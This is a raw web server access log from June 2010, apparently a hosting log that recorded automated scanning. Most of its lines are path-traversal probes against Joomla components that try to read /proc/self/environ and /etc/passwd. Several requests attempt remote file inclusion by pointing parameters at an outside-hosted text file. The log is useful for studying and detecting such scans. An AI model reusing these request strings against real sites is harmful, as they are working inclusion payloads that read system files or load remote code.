216.127.70.140 - - [21/Jun/2010:11:47:19 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:23 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:24 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:24 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:43 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:43 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:43 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:56 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:56 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:47:56 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:48:07 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:48:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:48:07 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
189.108.172.26 - - [21/Jun/2010:11:48:12 -0500] "GET /logs/access_log.1273622400/index.php?option=com_pcchess&controller=%20index.php?option=com_pcchess../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [21/Jun/2010:11:48:13 -0500] "GET /index.php?option=com_pcchess&controller=%20index.php?option=com_pcchess../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [21/Jun/2010:11:48:13 -0500] "GET /logs/index.php?option=com_pcchess&controller=%20index.php?option=com_pcchess../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
203.172.211.204 - - [21/Jun/2010:11:48:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
64.156.24.220 - - [21/Jun/2010:11:48:45 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:45 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:46 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:46 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:46 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:49 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:11:48:49 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.127.70.140 - - [21/Jun/2010:11:49:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:49:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:49:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:49:32 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
195.168.25.206 - - [21/Jun/2010:11:49:36 -0500] "GET /logs/index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.168.25.206 - - [21/Jun/2010:11:49:37 -0500] "GET /index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.127.70.140 - - [21/Jun/2010:11:49:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:49:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:50:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:50:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:51:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:51:38 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:51:38 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:51:50 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
201.36.173.93 - - [21/Jun/2010:11:51:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:11:51:52 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [21/Jun/2010:11:51:53 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.127.70.140 - - [21/Jun/2010:11:52:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:52:36 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:52:36 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.127.70.140 - - [21/Jun/2010:11:52:50 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.46.13.47 - - [21/Jun/2010:11:54:41 -0500] "GET /logs/access_log.1253491200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.49.22.240 - - [21/Jun/2010:11:56:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
203.172.211.204 - - [21/Jun/2010:11:58:32 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.172.211.204 - - [21/Jun/2010:11:58:33 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.172.211.204 - - [21/Jun/2010:11:58:34 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
64.156.24.220 - - [21/Jun/2010:12:00:59 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:12:01:01 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
64.156.24.220 - - [21/Jun/2010:12:01:41 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
72.30.142.216 - - [21/Jun/2010:12:02:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [21/Jun/2010:12:02:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.16.18.219 - - [21/Jun/2010:12:11:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [21/Jun/2010:12:11:40 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [21/Jun/2010:12:11:40 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [21/Jun/2010:12:28:18 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.214.220.151 - - [21/Jun/2010:12:33:37 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
85.235.154.15 - - [21/Jun/2010:12:33:43 -0500] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.228.85.91 - - [21/Jun/2010:12:33:46 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
188.40.232.234 - - [21/Jun/2010:12:34:03 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
69.64.91.113 - - [21/Jun/2010:12:34:34 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:12:34:34 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:12:34:35 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
69.175.59.242 - - [21/Jun/2010:12:35:16 -0500] "GET /microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:16 -0500] "GET /logs/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:16 -0500] "GET /logs/access_log.1274227200%20%20/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.64.91.113 - - [21/Jun/2010:12:35:17 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
69.175.59.242 - - [21/Jun/2010:12:35:21 -0500] "GET /microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:21 -0500] "GET /logs/access_log.1274227200%20%20/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:21 -0500] "GET /logs/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.64.91.113 - - [21/Jun/2010:12:35:26 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
69.64.91.113 - - [21/Jun/2010:12:35:32 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
206.214.220.151 - - [21/Jun/2010:12:35:39 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.175.59.242 - - [21/Jun/2010:12:35:56 -0500] "GET /microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:56 -0500] "GET /logs/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:35:56 -0500] "GET /logs/access_log.1274227200%20%20/microcms/micro_cms_files/microcms-include.php?microcms_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
67.222.18.143 - - [21/Jun/2010:12:36:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:12:36:08 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:12:36:08 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.222.18.143 - - [21/Jun/2010:12:36:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.175.59.242 - - [21/Jun/2010:12:36:50 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:36:50 -0500] "GET /index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:36:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.214.220.151 - - [21/Jun/2010:12:36:54 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:12:37:10 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
69.175.59.242 - - [21/Jun/2010:12:37:20 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:37:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:37:20 -0500] "GET /index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:38:46 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:38:46 -0500] "GET /index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.59.242 - - [21/Jun/2010:12:38:46 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.214.220.151 - - [21/Jun/2010:12:41:11 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:41:12 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:41:12 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [21/Jun/2010:12:42:43 -0500] "GET /?N=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.128.56 - - [21/Jun/2010:12:42:49 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
206.214.220.151 - - [21/Jun/2010:12:43:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:43:24 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:43:24 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:43:45 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:43:45 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
206.214.220.151 - - [21/Jun/2010:12:43:45 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:12:43:56 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
